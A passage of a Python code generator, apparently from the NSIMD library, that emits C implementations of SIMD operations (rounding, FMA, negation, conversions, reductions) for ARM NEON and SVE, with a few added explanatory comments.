elif typ == 'i64':
return emulate_op1('abs', 'neon128', 'i64')
else:
return f16f64(simd_ext, 'f64', 'abs', 'abs', 1)
else:
return 'return svabs_{suf}_x({svtrue}, {in0});'. \
format(**fmtspec)
# -----------------------------------------------------------------------------
# Round, trunc, ceil and round_to_even
def round1(op, simd_ext, typ):
if typ in common.iutypes:
return 'return {in0};'.format(**fmtspec)
armop = {'floor': 'rndm', 'ceil': 'rndp', 'trunc': 'rnd',
'round_to_even': 'rndn'}
if simd_ext == 'neon128':
        ret = f16f64('neon128', typ, op, armop[op], 1)
if ret != '':
return ret
        return emulate_op1(op, 'neon128', typ)
elif simd_ext == 'aarch64':
if typ == 'f16':
return f16f64('aarch64', 'f16', op, armop[op], 1)
else:
return 'return v{armop}q_{suf}({in0});'. \
format(armop=armop[op], **fmtspec)
else:
armop = {'floor': 'rintm', 'ceil': 'rintp', 'trunc': 'rintz',
'round_to_even': 'rintn'}
return 'return sv{armop}_{suf}_x({svtrue}, {in0});'. \
format(armop=armop[op], **fmtspec)
# -----------------------------------------------------------------------------
# FMA and FNMA
def fmafnma3(op, simd_ext, typ):
if typ in common.ftypes and simd_ext == 'aarch64':
armop = {'fma': 'fma', 'fnma': 'fms'}
else:
armop = {'fma': 'mla', 'fnma': 'mls'}
if simd_ext in neon:
normal = 'return v{armop}q_{suf}({in2}, {in1}, {in0});'. \
format(armop=armop[op], **fmtspec)
emul = emulate_op3_neon(op, simd_ext, typ)
if typ == 'f16':
using_f32 = \
'''nsimd_{simd_ext}_vf16 ret;
ret.v0 = nsimd_{op}_{simd_ext}_f32({in0}.v0, {in1}.v0, {in2}.v0);
ret.v1 = nsimd_{op}_{simd_ext}_f32({in0}.v1, {in1}.v1, {in2}.v1);
return ret;'''.format(op=op, **fmtspec)
if simd_ext == 'aarch64':
return \
'''#ifdef NSIMD_ARM_FP16
{}
#else
{}
#endif'''.format(emul, using_f32)
else:
return using_f32
elif simd_ext == 'neon128' and typ == 'f64':
return emulate_f64_neon('neon128', op, ['v'] * 4)
elif simd_ext == 'aarch64' and typ == 'f64':
return normal
elif typ in ['i64', 'u64']:
return emul
else:
return normal
else:
return 'return sv{armop}_{suf}_x({svtrue}, {in2}, {in1}, {in0});'. \
format(armop=armop[op], **fmtspec)
# -----------------------------------------------------------------------------
# FMS and FNMS
def fmsfnms3(op, simd_ext, typ):
if typ in common.iutypes:
return \
'''return nsimd_neg_{simd_ext}_{typ}(nsimd_{op2}_{simd_ext}_{typ}(
{in0}, {in1}, {in2}));'''. \
format(op2='fma' if op == 'fnms' else 'fnma', **fmtspec)
if simd_ext in neon:
return \
'''return nsimd_{op2}_{simd_ext}_{typ}({in0}, {in1},
nsimd_neg_{simd_ext}_{typ}({in2}));'''. \
format(op2='fma' if op == 'fms' else 'fnma', **fmtspec)
else:
armop = {'fnms': 'nmla', 'fms': 'nmls'}
return 'return sv{armop}_{suf}_x({svtrue}, {in2}, {in1}, {in0});'. \
format(armop=armop[op], **fmtspec)
# -----------------------------------------------------------------------------
# Neg
def neg1(simd_ext, typ):
if simd_ext in neon:
normal = 'return vnegq_{suf}({in0});'.format(**fmtspec)
if typ == 'f16':
return f16f64(simd_ext, 'f16', 'neg', 'neg', 1)
elif typ in ['i8', 'i16', 'i32', 'f32']:
return normal
elif typ in ['u8', 'u16', 'u32']:
return \
'''return vreinterpretq_{suf}_s{typnbits}(
vnegq_s{typnbits}(
vreinterpretq_s{typnbits}_{suf}({in0})));'''. \
format(**fmtspec)
elif simd_ext == 'neon128' and typ in ['i64', 'u64']:
return emulate_op1('neg', simd_ext, typ)
elif simd_ext == 'neon128' and typ == 'f64':
return \
'''nsimd_neon128_vf64 ret;
ret.v0 = -{in0}.v0;
ret.v1 = -{in0}.v1;
return ret;'''.format(**fmtspec)
elif simd_ext == 'aarch64' and typ in ['f64', 'i64']:
return normal
elif simd_ext == 'aarch64' and typ == 'u64':
return \
'''return vreinterpretq_u64_s64(vnegq_s64(
vreinterpretq_s64_u64({in0})));'''. \
format(**fmtspec)
else:
if typ in common.utypes:
return \
'''return svreinterpret_{suf}_s{typnbits}(
svneg_s{typnbits}_x({svtrue},
svreinterpret_s{typnbits}_{suf}({in0})));'''. \
format(**fmtspec)
else:
return 'return svneg_{suf}_x({svtrue}, {in0});'.format(**fmtspec)
# -----------------------------------------------------------------------------
# Reciprocals
def recs1(op, simd_ext, typ):
cte = '({typ})1'.format(**fmtspec) if typ != 'f16' \
else 'nsimd_f32_to_f16(1.0f)'
if op in ['rec', 'rec11']:
return \
'''return nsimd_div_{simd_ext}_{typ}(
nsimd_set1_{simd_ext}_{typ}({cte}), {in0});'''. \
format(cte=cte, **fmtspec)
elif op == 'rsqrt11':
return \
'''return nsimd_div_{simd_ext}_{typ}(
nsimd_set1_{simd_ext}_{typ}({cte}),
nsimd_sqrt_{simd_ext}_{typ}({in0}));'''. \
format(cte=cte, **fmtspec)
elif op in ['rec8', 'rsqrt8']:
armop = 'recpe' if op == 'rec8' else 'rsqrte'
if simd_ext in sve:
return 'return sv{armop}_{suf}({in0});'. \
format(armop=armop, **fmtspec)
else:
ret = f16f64(simd_ext, typ, op, armop, 1)
if ret != '':
return ret
return 'return v{armop}q_{suf}({in0});'. \
format(armop=armop, **fmtspec)
# Rec11 and rsqrt11
# According to http://infocenter.arm.com/help/topic/com.arm.doc.faqs/ka14282.html
# reciprocal estimates only work when inputs are restricted to some small
# interval, so we comment these out for now and return full-precision reciprocals.
# def rec11rsqrt11(op, simd_ext, typ):
# armop = {'rec11': 'recpe', 'rsqrt11': 'rsqrte'}
# if simd_ext in neon:
# ret = f16f64(simd_ext, typ, op, armop[op], 1)
# if ret != '':
# return ret
# return 'return v{armop}q_{suf}({in0});'. \
# format(armop=armop[op], **fmtspec)
# else:
# return 'return sv{armop}_{suf}({in0});'. \
# format(armop=armop[op], **fmtspec)
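# Illustration (added note, not in the original generator): with the estimate
# intrinsics disabled above, rec11 falls back to a full-precision division, e.g.
# recs1('rec11', 'aarch64', 'f32') is expected to emit roughly
#     return nsimd_div_aarch64_f32(nsimd_set1_aarch64_f32((f32)1), a0);
# (assuming common.in0 expands to a0).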
# -----------------------------------------------------------------------------
# Load of logicals
def loadl(aligned, simd_ext, typ):
return \
'''/* This can surely be improved but it is not our priority. */
return nsimd_notl_{simd_ext}_{typ}(nsimd_eq_{simd_ext}_{typ}(
nsimd_load{align}_{simd_ext}_{typ}(
{in0}), nsimd_set1_{simd_ext}_{typ}({zero})));'''. \
format(align='a' if aligned else 'u',
zero = 'nsimd_f32_to_f16(0.0f)' if typ == 'f16'
else '({})0'.format(typ), **fmtspec)
# -----------------------------------------------------------------------------
# Store of logicals
def storel(aligned, simd_ext, typ):
return \
'''/* This can surely be improved but it is not our priority. */
nsimd_store{align}_{simd_ext}_{typ}({in0},
nsimd_if_else1_{simd_ext}_{typ}({in1},
nsimd_set1_{simd_ext}_{typ}({one}),
nsimd_set1_{simd_ext}_{typ}({zero})));'''. \
format(align = 'a' if aligned else 'u',
one = 'nsimd_f32_to_f16(1.0f)' if typ == 'f16'
else '({})1'.format(typ),
zero = 'nsimd_f32_to_f16(0.0f)' if typ == 'f16'
else '({})0'.format(typ), **fmtspec)
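# Illustration (added note, not in the original generator): storel(True, 'aarch64', 'f32')
# is expected to emit roughly
#     nsimd_storea_aarch64_f32(a0, nsimd_if_else1_aarch64_f32(a1,
#         nsimd_set1_aarch64_f32((f32)1), nsimd_set1_aarch64_f32((f32)0)));
# i.e. logicals are materialized as 1/0 values in memory (a0/a1 assumed for the args).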
# -----------------------------------------------------------------------------
# All and any
def allany1(opts, op, simd_ext, typ):
binop = '&&' if op == 'all' else '||'
if simd_ext == 'neon128':
if typ == 'f16':
return \
'''return nsimd_{op}_neon128_f32({in0}.v0) {binop}
nsimd_{op}_neon128_f32({in0}.v1);'''. \
format(op=op, binop=binop, **fmtspec)
elif typ == 'f64':
return 'return {in0}.v0 {binop} {in0}.v1;'. \
format(binop=binop, **fmtspec)
else:
return 'return ' + \
binop.join(['vgetq_lane_u{typnbits}({in0}, {i})'. \
format(i=i, **fmtspec) \
for i in range(0, 128 // int(fmtspec['typnbits']))]) + \
';'
elif simd_ext == 'aarch64':
armop = {'all': 'min', 'any': 'max'}
normal = 'return v{armop}vq_u{typnbits}({in0}) != 0;'. \
format(armop=armop[op], **fmtspec)
if typ == 'f16':
return \
'''#ifdef NSIMD_ARM_FP16
{normal}
#else
return nsimd_{op}_aarch64_f32({in0}.v0) {binop}
nsimd_{op}_aarch64_f32({in0}.v1);
#endif'''.format(normal=normal, op=op, binop=binop, **fmtspec)
elif typ in ['i64', 'u64', 'f64']:
return \
'return v{armop}vq_u32(vreinterpretq_u32_u64({in0})) != 0;'. \
format(armop=armop[op], **fmtspec)
else:
return normal
elif simd_ext in sve:
if op == 'any':
operand= convert_to_predicate(opts, '{in0}'.format(**fmtspec))
return '''return svptest_any({svtrue}, {operand});'''. \
format(operand=operand, **fmtspec)
else:
operand='svnot_z({svtrue}, {op})'. \
format(op=convert_to_predicate(opts, '{in0}'.format(**fmtspec)),
**fmtspec)
return '''return !svptest_any({svtrue}, {operand});'''. \
format(operand=operand, **fmtspec)
# -----------------------------------------------------------------------------
# nbtrue
def nbtrue1(opts, simd_ext, typ):
if simd_ext == 'neon128':
if typ == 'f16':
return \
'''return nsimd_nbtrue_neon128_f32({in0}.v0) +
nsimd_nbtrue_neon128_f32({in0}.v1);'''. \
format(**fmtspec)
elif typ == 'f64':
return 'return -(int)((i64){in0}.v0 + (i64){in0}.v1);'. \
format(**fmtspec)
else:
return \
'''nsimd_neon128_vi{typnbits} temp =
vreinterpretq_s{typnbits}_u{typnbits}({in0});
return -(int)('''.format(**fmtspec) + \
'+'.join(['vgetq_lane_s{typnbits}(temp, {i})'. \
format(i=i, **fmtspec) \
for i in range(0, 128 // int(fmtspec['typnbits']))]) + \
');'
elif simd_ext == 'aarch64':
normal = \
'''return -(int)vaddvq_s{typnbits}(
vreinterpretq_s{typnbits}_u{typnbits}({in0}));'''. \
format(**fmtspec)
if typ == 'f16':
return \
'''#ifdef NSIMD_ARM_FP16
{normal}
#else
return nsimd_nbtrue_aarch64_f32({in0}.v0) +
nsimd_nbtrue_aarch64_f32({in0}.v1);
#endif'''.format(normal=normal, **fmtspec)
elif typ in ['i64', 'u64', 'f64']:
return \
'''return -(vaddvq_s32(vreinterpretq_s32_u64({in0})) >> 1);'''. \
format(**fmtspec)
else:
return normal
elif simd_ext in sve:
return 'return (int)svcntp_b{typnbits}({svtrue}, {op});'. \
format(op=convert_to_predicate(opts, '{in0}'.format(**fmtspec)),
**fmtspec)
# -----------------------------------------------------------------------------
# Reinterpret logical
def reinterpretl1(simd_ext, from_typ, to_typ):
if from_typ == to_typ or simd_ext in sve:
return 'return {in0};'.format(**fmtspec)
to_f16_with_f32 = \
'''nsimd_{simd_ext}_vlf16 ret;
u32 buf[4];
buf[0] = (vgetq_lane_u16({in0}, 0) ? (u32)-1 : 0);
buf[1] = (vgetq_lane_u16({in0}, 1) ? (u32)-1 : 0);
buf[2] = (vgetq_lane_u16({in0}, 2) ? (u32)-1 : 0);
buf[3] = (vgetq_lane_u16({in0}, 3) ? (u32)-1 : 0);
ret.v0 = vld1q_u32(buf);
buf[0] = (vgetq_lane_u16({in0}, 4) ? (u32)-1 : 0);
buf[1] = (vgetq_lane_u16({in0}, 5) ? (u32)-1 : 0);
buf[2] = (vgetq_lane_u16({in0}, 6) ? (u32)-1 : 0);
buf[3] = (vgetq_lane_u16({in0}, 7) ? (u32)-1 : 0);
ret.v1 = vld1q_u32(buf);
return ret;'''.format(**fmtspec)
from_f16_with_f32 = \
'''u16 buf[8];
buf[0] = (vgetq_lane_u32({in0}.v0, 0) ? (u16)-1 : 0);
buf[1] = (vgetq_lane_u32({in0}.v0, 1) ? (u16)-1 : 0);
buf[2] = (vgetq_lane_u32({in0}.v0, 2) ? (u16)-1 : 0);
buf[3] = (vgetq_lane_u32({in0}.v0, 3) ? (u16)-1 : 0);
buf[4] = (vgetq_lane_u32({in0}.v1, 0) ? (u16)-1 : 0);
buf[5] = (vgetq_lane_u32({in0}.v1, 1) ? (u16)-1 : 0);
buf[6] = (vgetq_lane_u32({in0}.v1, 2) ? (u16)-1 : 0);
buf[7] = (vgetq_lane_u32({in0}.v1, 3) ? (u16)-1 : 0);
return vld1q_u16(buf);'''.format(**fmtspec)
if simd_ext == 'neon128':
if to_typ == 'f16':
return to_f16_with_f32
elif from_typ == 'f16':
return from_f16_with_f32
elif to_typ == 'f64':
return '''nsimd_neon128_vlf64 ret;
ret.v0 = vgetq_lane_u64({in0}, 0);
ret.v1 = vgetq_lane_u64({in0}, 1);
return ret;'''.format(**fmtspec)
elif from_typ == 'f64':
return '''u64 buf[2];
buf[0] = {in0}.v0;
buf[1] = {in0}.v1;
return vld1q_u64(buf);'''.format(**fmtspec)
else:
return 'return {in0};'.format(**fmtspec)
elif simd_ext == 'aarch64':
if to_typ == 'f16':
return '''#ifdef NSIMD_ARM_FP16
return {in0};
#else
{using_f32}
#endif'''.format(using_f32=to_f16_with_f32, **fmtspec)
elif from_typ == 'f16':
return '''#ifdef NSIMD_ARM_FP16
return {in0};
#else
{using_f32}
#endif'''.format(using_f32=from_f16_with_f32, **fmtspec)
else:
return 'return {in0};'.format(**fmtspec)
# -----------------------------------------------------------------------------
# Convert
def convert1(simd_ext, from_typ, to_typ):
fmtspec2 = fmtspec.copy()
fmtspec2['to_suf'] = suf(to_typ)
fmtspec2['from_suf'] = suf(from_typ)
if from_typ == to_typ:
return 'return {in0};'.format(**fmtspec)
if from_typ in common.iutypes and to_typ in common.iutypes:
if simd_ext in neon:
return 'return vreinterpretq_{to_suf}_{from_suf}({in0});'. \
format(**fmtspec2)
else:
return 'return svreinterpret_{to_suf}_{from_suf}({in0});'. \
format(**fmtspec2)
if simd_ext in sve:
return 'return svcvt_{to_suf}_{from_suf}_x({svtrue}, {in0});'. \
format(**fmtspec2)
to_f16_with_f32 = \
'''nsimd_{simd_ext}_vf16 ret;
f32 buf[4];
buf[0] = (f32)vgetq_lane_{from_suf}({in0}, 0);
buf[1] = (f32)vgetq_lane_{from_suf}({in0}, 1);
buf[2] = (f32)vgetq_lane_{from_suf}({in0}, 2);
buf[3] = (f32)vgetq_lane_{from_suf}({in0}, 3);
ret.v0 = vld1q_f32(buf);
buf[0] = (f32)vgetq_lane_{from_suf}({in0}, 4);
buf[1] = (f32)vgetq_lane_{from_suf}({in0}, 5);
buf[2] = (f32)vgetq_lane_{from_suf}({in0}, 6);
buf[3] = (f32)vgetq_lane_{from_suf}({in0}, 7);
ret.v1 = vld1q_f32(buf);
return ret;'''.format(**fmtspec2)
from_f16_with_f32 = \
'''{to_typ} buf[8];
buf[0] = ({to_typ})vgetq_lane_f32({in0}.v0, 0);
buf[1] = ({to_typ})vgetq_lane_f32({in0}.v0, 1);
buf[2] = ({to_typ})vgetq_lane_f32({in0}.v0, 2);
buf[3] = ({to_typ})vgetq_lane_f32({in0}.v0, 3);
buf[4] = ({to_typ})vgetq_lane_f32({in0}.v1, 0);
buf[5] = ({to_typ})vgetq_lane_f32({in0}.v1, 1);
buf[6] = ({to_typ})vgetq_lane_f32({in0}.v1, 2);
buf[7] = ({to_typ})vgetq_lane_f32({in0}.v1, 3);
return vld1q_{to_suf}(buf);'''.format(**fmtspec2)
if simd_ext == 'neon128':
if to_typ == 'f16':
return to_f16_with_f32
elif from_typ == 'f16':
return from_f16_with_f32
elif to_typ == 'f64':
return '''nsimd_neon128_vf64 ret;
ret.v0 = (f64)vgetq_lane_{from_suf}({in0}, 0);
ret.v1 = (f64)vgetq_lane_{from_suf}({in0}, 1);
return ret;'''.format(**fmtspec2)
elif from_typ == 'f64':
return '''{to_typ} buf[2];
buf[0] = ({to_typ}){in0}.v0;
buf[1] = ({to_typ}){in0}.v1;
return vld1q_{to_suf}(buf);'''.format(**fmtspec2)
else:
return 'return vcvtq_{to_suf}_{from_suf}({in0});'. \
format(**fmtspec2)
elif simd_ext == 'aarch64':
if to_typ == 'f16':
return '''#ifdef NSIMD_ARM_FP16
return vcvtq_{to_suf}_{from_suf}({in0});
#else
{using_f32}
#endif'''.format(using_f32=to_f16_with_f32, **fmtspec2)
elif from_typ == 'f16':
return '''#ifdef NSIMD_ARM_FP16
return vcvtq_{to_suf}_{from_suf}({in0});
#else
{using_f32}
#endif'''.format(using_f32=from_f16_with_f32, **fmtspec2)
else:
return 'return vcvtq_{to_suf}_{from_suf}({in0});'. \
format(**fmtspec2)
# -----------------------------------------------------------------------------
# Reinterpret
def reinterpret1(simd_ext, from_typ, to_typ):
fmtspec2 = fmtspec.copy()
fmtspec2['to_suf'] = suf(to_typ)
fmtspec2['from_suf'] = suf(from_typ)
if from_typ == to_typ:
return 'return {in0};'.format(**fmtspec)
if simd_ext in sve:
return 'return svreinterpret_{to_suf}_{from_suf}({in0});'. \
format(**fmtspec2)
to_f16_with_f32 = \
'''nsimd_{simd_ext}_vf16 ret;
f32 buf[4];
buf[0] = nsimd_u16_to_f32((u16)vgetq_lane_{from_suf}({in0}, 0));
buf[1] = nsimd_u16_to_f32((u16)vgetq_lane_{from_suf}({in0}, 1));
buf[2] = nsimd_u16_to_f32((u16)vgetq_lane_{from_suf}({in0}, 2));
buf[3] = nsimd_u16_to_f32((u16)vgetq_lane_{from_suf}({in0}, 3));
ret.v0 = vld1q_f32(buf);
buf[0] = nsimd_u16_to_f32((u16)vgetq_lane_{from_suf}({in0}, 4));
buf[1] = nsimd_u16_to_f32((u16)vgetq_lane_{from_suf}({in0}, 5));
buf[2] = nsimd_u16_to_f32((u16)vgetq_lane_{from_suf}({in0}, 6));
buf[3] = nsimd_u16_to_f32((u16)vgetq_lane_{from_suf}({in0}, 7));
ret.v1 = vld1q_f32(buf);
return ret;'''.format(**fmtspec2)
from_f16_with_f32 = \
'''{to_typ} buf[8];
buf[0] = ({to_typ})nsimd_f32_to_u16(vgetq_lane_f32({in0}.v0, 0));
buf[1] = ({to_typ})nsimd_f32_to_u16(vgetq_lane_f32({in0}.v0, 1));
buf[2] = ({to_typ})nsimd_f32_to_u16(vgetq_lane_f32({in0}.v0, 2));
buf[3] = ({to_typ})nsimd_f32_to_u16(vgetq_lane_f32({in0}.v0, 3));
buf[4] = ({to_typ})nsimd_f32_to_u16(vgetq_lane_f32({in0}.v1, 0));
buf[5] = ({to_typ})nsimd_f32_to_u16(vgetq_lane_f32({in0}.v1, 1));
buf[6] = ({to_typ})nsimd_f32_to_u16(vgetq_lane_f32({in0}.v1, 2));
buf[7] = ({to_typ})nsimd_f32_to_u16(vgetq_lane_f32({in0}.v1, 3));
return vld1q_{to_suf}(buf);'''.format(**fmtspec2)
if simd_ext == 'neon128':
if to_typ == 'f16':
return to_f16_with_f32
elif from_typ == 'f16':
return from_f16_with_f32
elif to_typ == 'f64':
return '''nsimd_neon128_vf64 ret;
union {{ f64 to; {from_typ} from; }} buf;
buf.from = vgetq_lane_{from_suf}({in0}, 0);
ret.v0 = buf.to;
buf.from = vgetq_lane_{from_suf}({in0}, 1);
ret.v1 = buf.to;
return ret;'''.format(**fmtspec2)
elif from_typ == 'f64':
return '''union {{ f64 from; {to_typ} to; }} buf_;
{to_typ} buf[2];
buf_.from = {in0}.v0;
buf[0] = buf_.to;
buf_.from = {in0}.v1;
buf[1] = buf_.to;
return vld1q_{to_suf}(buf);'''.format(**fmtspec2)
else:
return 'return vreinterpretq_{to_suf}_{from_suf}({in0});'. \
format(**fmtspec2)
elif simd_ext == 'aarch64':
if to_typ == 'f16':
return '''#ifdef NSIMD_ARM_FP16
return vreinterpretq_{to_suf}_{from_suf}({in0});
#else
{using_f32}
#endif'''.format(using_f32=to_f16_with_f32, **fmtspec2)
elif from_typ == 'f16':
return '''#ifdef NSIMD_ARM_FP16
return vreinterpretq_{to_suf}_{from_suf}({in0});
#else
{using_f32}
#endif'''.format(using_f32=from_f16_with_f32, **fmtspec2)
else:
return 'return vreinterpretq_{to_suf}_{from_suf}({in0});'. \
format(**fmtspec2)
# -----------------------------------------------------------------------------
# reverse
def reverse1(simd_ext, typ):
armtyp = suf(typ)
if simd_ext in sve:
return '''return svrev_{suf}( {in0} );'''.format(**fmtspec)
elif simd_ext == 'neon128' and typ == 'f64':
return '''nsimd_neon128_vf64 ret;
ret.v0 = {in0}.v1;
ret.v1 = {in0}.v0;
return ret;'''.format(**fmtspec)
elif typ in [ 'i64', 'u64', 'f64' ]:
return '''return vcombine_{armtyp}(vget_high_{armtyp}({in0}),
vget_low_{armtyp}({in0}));'''. \
format(armtyp=armtyp, **fmtspec)
elif typ == 'f16':
return '''nsimd_{simd_ext}_vf16 ret;
                  ret.v0 = nsimd_reverse_{simd_ext}_f32({in0}.v1);
                  ret.v1 = nsimd_reverse_{simd_ext}_f32({in0}.v0);
return ret;'''.format(**fmtspec)
else:
return '''{in0} = vrev64q_{armtyp}({in0});
return vcombine_{armtyp}(vget_high_{armtyp}({in0}),
vget_low_{armtyp}({in0}));'''. \
format(armtyp=armtyp, **fmtspec)
# -----------------------------------------------------------------------------
# Horizontal sum
def addv(simd_ext, typ):
if simd_ext == 'neon128':
if typ == 'f64':
return 'return ({typ})({in0}.v0 + {in0}.v1);'.format(**fmtspec)
elif typ == 'f16':
return \
'''#ifdef NSIMD_ARM_FP16
{t} tmp = vadd_{suf}(vget_low_{suf}({in0}),
vget_high_{suf}({in0}));
                   tmp = vadd_{suf}(tmp, vext_{suf}(tmp, tmp, 2));
                   tmp = vadd_{suf}(tmp, vext_{suf}(tmp, tmp, 1));
return vget_lane_{suf}(tmp, 0);
#else
float32x2_t tmp0 = vadd_f32(vget_low_f32({in0}.v0),
vget_high_f32({in0}.v0));
tmp0 = vadd_f32(tmp0, vext_f32(tmp0, tmp0, 1));
float32x2_t tmp1 = vadd_f32(vget_low_f32({in0}.v1),
vget_high_f32({in0}.v1));
tmp1 = vadd_f32(tmp1, vext_f32(tmp1, tmp1, 1));
return nsimd_f32_to_f16(vget_lane_f32(tmp0, 0) +
vget_lane_f32(tmp1, 0));
#endif''' .format(t=half_neon64_typ(typ), **fmtspec)
elif typ == 'f32':
return \
'''{t} tmp = vadd_{suf}(vget_low_{suf}({in0}),
vget_high_{suf}({in0}));
tmp = vadd_{suf}(tmp, vext_{suf}(tmp, tmp, 1));
return vget_lane_{suf}(tmp, 0);'''. \
format(t=half_neon64_typ(typ), **fmtspec)
elif typ[0] in ['i', 'u']:
            le = 128 // int(typ[1:])
return \
'''{typ} res = ({typ})0;
{typ} buf[{le}];
vst1q_{suf}(buf, {in0});
for (int i = 0; i < {le}; i++) {{
res += buf[i];
}}
return res;'''. \
format(le=le, **fmtspec)
elif simd_ext == 'aarch64':
if typ == 'f16':
return \
'''#ifdef NSIMD_ARM_FP16
{t} tmp = vadd_{suf}(vget_low_{suf}({in0}),
vget_high_{suf}({in0}));
               tmp = vadd_{suf}(tmp, vext_{suf}(tmp, tmp, 2));
               tmp = vadd_{suf}(tmp, vext_{suf}(tmp, tmp, 1));
return vget_lane_{suf}(tmp, 0);
#else
float32x2_t tmp0 = vadd_f32(vget_low_f32({in0}.v0),
vget_high_f32({in0}.v0));
tmp0 = vadd_f32(tmp0, vext_f32(tmp0, tmp0, 1));
float32x2_t tmp1 = vadd_f32(vget_low_f32({in0}.v1),
vget_high_f32({in0}.v1));
tmp1 = vadd_f32(tmp1, vext_f32(tmp1, tmp1, 1));
return nsimd_f32_to_f16(vget_lane_f32(tmp0, 0) +
vget_lane_f32(tmp1, 0));
#endif''' .format(t=half_neon64_typ(typ), **fmtspec)
elif typ in ['f32', 'f64']:
return 'return vaddvq_{suf}({in0});'.format(**fmtspec)
elif simd_ext in sve:
return 'return svaddv_{suf}({svtrue}, {in0});' .format(**fmtspec)
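# Illustration (added note, not in the original generator): the neon128 f32 reduction
# above is a pairwise sum. For a vector [a, b, c, d]:
#     vadd_f32(low, high)            -> [a+c, b+d]
#     vadd_f32(t, vext_f32(t, t, 1)) -> [a+c+b+d, ...]
#     vget_lane_f32(t, 0)            -> a+b+c+d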
# -----------------------------------------------------------------------------
# Up convert
def upcvt1(simd_ext, from_typ, to_typ):
# For integer upcast, due to 2's complement representation
# _s : signed -> bigger signed
# _s : signed -> bigger unsigned
# _u : unsigned -> bigger signed
# _u : unsigned -> bigger unsigned
if simd_ext in neon:
if from_typ == 'f16' and to_typ == 'f32':
return \
'''#ifdef NSIMD_ARM_FP16
nsimd_{simd_ext}_vf32x2 ret;
ret.v0 = vcvt_f32_f16(vget_low_{suf}({in0}));
ret.v1 = vcvt_f32_f16(vget_high_{suf}({in0}));
return ret;
#else
nsimd_{simd_ext}_vf32x2 ret;
ret.v0 = {in0}.v0;
ret.v1 = {in0}.v1;
return ret;
#endif'''.format(**fmtspec)
elif from_typ == 'f32' and to_typ == 'f64':
if simd_ext == 'neon128':
return \
'''nsimd_neon128_vf64x2 ret;
f32 buf[4];
vst1q_f32(buf, {in0});
ret.v0.v0 = (f64)buf[0];
ret.v0.v1 = (f64)buf[1];
ret.v1.v0 = (f64)buf[2];
ret.v1.v1 = (f64)buf[3];
return ret;'''.format(**fmtspec)
else:
return \
'''nsimd_aarch64_vf64x2 ret;
ret.v0 = vcvt_f64_f32(vget_low_{suf}({in0}));
ret.v1 = vcvt_f64_f32(vget_high_{suf}({in0}));
return ret;'''.format(**fmtspec)
elif (from_typ in common.itypes and to_typ in common.itypes) or \
(from_typ in common.utypes and to_typ in common.utypes):
return '''nsimd_{simd_ext}_v{to_typ}x2 ret;
ret.v0 = vmovl_{suf}(vget_low_{suf}({in0}));
ret.v1 = vmovl_{suf}(vget_high_{suf}({in0}));
return ret;'''.format(**fmtspec)
elif (from_typ in common.itypes and to_typ in common.utypes) or \
(from_typ in common.utypes and to_typ in common.itypes):
return '''nsimd_{simd_ext}_v{to_typ}x2 ret;
ret.v0 = vreinterpretq_{suf_to_typ}_{suf_int_typ}(
vmovl_{suf}(vget_low_{suf}({in0})));
ret.v1 = vreinterpretq_{suf_to_typ}_{suf_int_typ}(
vmovl_{suf}(vget_high_{suf}({in0})));
return ret;'''. \
format(suf_to_typ=suf(to_typ),
suf_int_typ=suf(from_typ[0] + to_typ[1:]),
**fmtspec)
else:
return \
'''nsimd_{simd_ext}_v{to_typ}x2 ret;
nsimd_{simd_ext}_v{int_typ}x2 tmp;
tmp = nsimd_upcvt_{simd_ext}_{int_typ}_{from_typ}({in0});
ret.v0 = nsimd_cvt_{simd_ext}_{to_typ}_{int_typ}(tmp.v0);
ret.v1 = nsimd_cvt_{simd_ext}_{to_typ}_{int_typ}(tmp.v1);
return ret;'''. \
format(int_typ=from_typ[0] + to_typ[1:], **fmtspec)
# Getting here means that we deal with SVE
if (from_typ in common.itypes and to_typ in common.itypes) or \
(from_typ in common.utypes and to_typ in common.utypes):
return '''nsimd_{simd_ext}_v{to_typ}x2 ret;
ret.v0 = svunpklo_{suf_to_typ}({in0});
ret.v1 = svunpkhi_{suf_to_typ}({in0});
return ret;'''.format(suf_to_typ=suf(to_typ), **fmtspec)
elif (from_typ in common.itypes and to_typ in common.utypes) or \
(from_typ in common.utypes and to_typ in common.itypes):
return \
'''nsimd_{simd_ext}_v{to_typ}x2 ret;
ret.v0 = svreinterpret_{suf_to_typ}_{suf_int_typ}(
svunpklo_{suf_int_typ}({in0}));
ret.v1 = svreinterpret_{suf_to_typ}_{suf_int_typ}(
svunpkhi_{suf_int_typ}({in0}));
return ret;'''. \
format(suf_to_typ=suf(to_typ),
suf_int_typ=suf(from_typ[0] + to_typ[1:]), **fmtspec)
elif from_typ in common.iutypes and to_typ in common.ftypes:
return \
'''nsimd_{simd_ext}_v{to_typ}x2 ret;
ret.v0 = svcvt_{suf_to_typ}_{suf_int_typ}_x(
{svtrue}, svunpklo_{suf_int_typ}({in0}));
ret.v1 = svcvt_{suf_to_typ}_{suf_int_typ}_x(
{svtrue}, svunpkhi_{suf_int_typ}({in0}));
return ret;'''. \
format(suf_to_typ=suf(to_typ),
suf_int_typ=suf(from_typ[0] + to_typ[1:]), **fmtspec)
else:
return \
'''nsimd_{simd_ext}_v{to_typ}x2 ret;
ret.v0 = svcvt_{suf_to_typ}_{suf}_x({svtrue}, svzip1_{suf}(
{in0}, {in0}));
ret.v1 = svcvt_{suf_to_typ}_{suf}_x({svtrue}, svzip2_{suf}(
{in0}, {in0}));
return ret;'''.format(suf_to_typ=suf(to_typ), **fmtspec)
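# Illustration (added note, not in the original generator): for the mixed-signedness
# NEON branch, upcvt1('aarch64', 'i8', 'u16') is expected to emit roughly
#     nsimd_aarch64_vu16x2 ret;
#     ret.v0 = vreinterpretq_u16_s16(vmovl_s8(vget_low_s8(a0)));
#     ret.v1 = vreinterpretq_u16_s16(vmovl_s8(vget_high_s8(a0)));
#     return ret;
# (assuming common.in0 expands to a0 and suf('i8') == 's8').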
# -----------------------------------------------------------------------------
# Down convert
def downcvt1(simd_ext, from_typ, to_typ):
if simd_ext in neon:
if from_typ == 'f64' and to_typ == 'f32':
if simd_ext == 'neon128':
return '''f32 buf[4];
buf[0] = (f32){in0}.v0;
buf[1] = (f32){in0}.v1;
buf[2] = (f32){in1}.v0;
buf[3] = (f32){in1}.v1;
return vld1q_f32(buf);'''.format(**fmtspec)
else:
return '''return vcombine_f32(vcvt_f32_f64({in0}),
vcvt_f32_f64({in1}));'''. \
format(**fmtspec)
elif from_typ == 'f32' and to_typ == 'f16':
return '''#ifdef NSIMD_ARM_FP16
return vcombine_f16(vcvt_f16_f32({in0}),
vcvt_f16_f32({in1}));
#else
nsimd_{simd_ext}_vf16 ret;
ret.v0 = {in0};
ret.v1 = {in1};
return ret;
#endif'''.format(**fmtspec)
